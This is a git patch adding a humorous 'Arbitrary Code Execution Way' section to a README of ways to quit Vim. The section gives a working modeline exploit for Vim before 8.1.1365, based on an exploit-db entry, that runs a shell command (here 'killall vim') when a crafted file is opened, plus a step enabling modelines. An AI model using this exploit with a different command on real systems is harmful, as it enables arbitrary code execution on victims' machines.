From b0ae82d18f3f19c5364e80bfbbefc847033efa46 Mon Sep 17 00:00:00 2001
From: "Hikaru Terazono (3c1u)" <3c1u@vulpesgames.tokyo>
Date: Tue, 14 Jan 2020 08:18:13 +0900
Subject: [PATCH] Add The Arbitrary Code Execution Way

---
 README.md | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)

diff --git a/README.md b/README.md
index d2dfe82..7676874 100644
--- a/README.md
+++ b/README.md
@@ -639,3 +639,20 @@ ssh -i <ec2 keypair pem location> ec2-user@<ec2 instance ip address>
 vim
 ```
 5. In the AWS EC2, select the newly created EC2 instance and terminate the instance.
+
+## The Arbitrary Code Execution Way
+
+Based on https://www.exploit-db.com/exploits/46973. Works with Vim < 8.1.1365.
+
+1. Create a file (say `quit.txt`) with the following data:
+```
+echo ':!killall vim||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="' > quit.txt
+```
+2. Ensure that the modeline option has not been disabled.
+```
+echo "set modeline" >> .vimrc
+```
+3. Open `quit.txt`.
+```
+:e! quit.txt
+```